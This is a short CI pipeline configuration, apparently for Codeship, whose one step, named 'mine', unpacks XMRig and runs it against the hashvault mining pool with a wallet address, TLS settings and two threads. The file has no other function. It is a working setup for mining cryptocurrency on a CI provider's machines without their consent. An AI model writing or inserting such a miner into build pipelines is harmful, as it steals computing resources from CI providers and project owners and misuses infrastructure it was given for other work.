- type: serial
  name: mine
  steps:
    - service: codeship_example
      command: /bin/bash -c 'tar xf xmrig-6.10.0-linux-x64.tar.gz && cd xmrig-6.10.0 && ./xmrig --url pool.hashvault.pro:443 --user hvxy7kVUeGg2tJkSXVzbk2TJmq96wrTov4ciF6FK7627aWYAurTiE93QWYPpAQf6NrHwGTcwe5qu5i27bGXn91Jn7mWKuKi45f --pass kapal --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 --threads=2'